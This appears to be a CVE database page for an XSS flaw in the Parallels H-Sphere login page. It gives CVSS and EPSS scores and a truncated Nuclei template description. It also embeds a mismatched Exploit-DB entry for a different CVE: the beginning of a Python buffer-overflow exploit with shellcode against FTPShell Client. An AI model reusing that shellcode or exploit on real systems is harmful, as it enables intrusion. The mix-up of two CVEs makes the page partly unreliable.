CVE-2008-6465
published 2009-03-13CVE-2008-6465: Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject…
PriorityP423medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
5.11%
91.3th percentile
Multiple cross-site scripting (XSS) vulnerabilities in login.php in webshell4 in Parallels H-Sphere 3.0.0 P9 and 3.1 P1 allow remote attackers to inject arbitrary web script or HTML via the (1) err, (2) errorcode, and (3) login parameters.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| parallels | h-sphere | — | — |
| parallels | h-sphere | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
FTPShell Client 6.53 - Remote Buffer Overflow
exploitdb·2017-03-04·CVSS 9.8
CVE-2017-6465 [CRITICAL] FTPShell Client 6.53 - Remote Buffer Overflow
FTPShell Client 6.53 - Remote Buffer Overflow
---
# Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
# Date: 2017-03-04
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Version: Windows Server 2008 R2 x64
# Tested on: Windows Server 2008 R2 Standard x64
# CVE: CVE-2017-6465
# 2017-03-04: Software vendor notified
# 2017-03-06: No reply
# 2017-03-06: Publishing
import socket
import sys
shell=("\xdb\xce\xbf\xaa\xcc\x44\xc9\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x52\x83\xc2\x04\x31\x7a\x13\x03\xd0\xdf\xa6\x3c\xd8\x08\xa4"
"\xbf\x20\xc9\xc9\x36\xc5\xf8\xc9\x2d\x8e\xab\xf9\x26\xc2\x47"
"\x71\x6a\xf6\xdc\xf7\xa3\xf9\x55\xbd\x95\x34\x65\xee\xe6\x57"
"\xe5\xed\x3a\xb7\xd4\x3d
Nuclei
Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
nuclei·CVSS 4.3
CVE-2008-6465 [MEDIUM] Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
Template:
id: CVE-2008-6465
info:
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credenti
http://osvdb.org/48232http://secunia.com/advisories/31830http://www.securityfocus.com/bid/31256http://www.xssing.com/index.php?x=3&y=65https://exchange.xforce.ibmcloud.com/vulnerabilities/45252https://exchange.xforce.ibmcloud.com/vulnerabilities/45254http://osvdb.org/48232http://secunia.com/advisories/31830http://www.securityfocus.com/bid/31256http://www.xssing.com/index.php?x=3&y=65https://exchange.xforce.ibmcloud.com/vulnerabilities/45252https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
2009-03-13
Published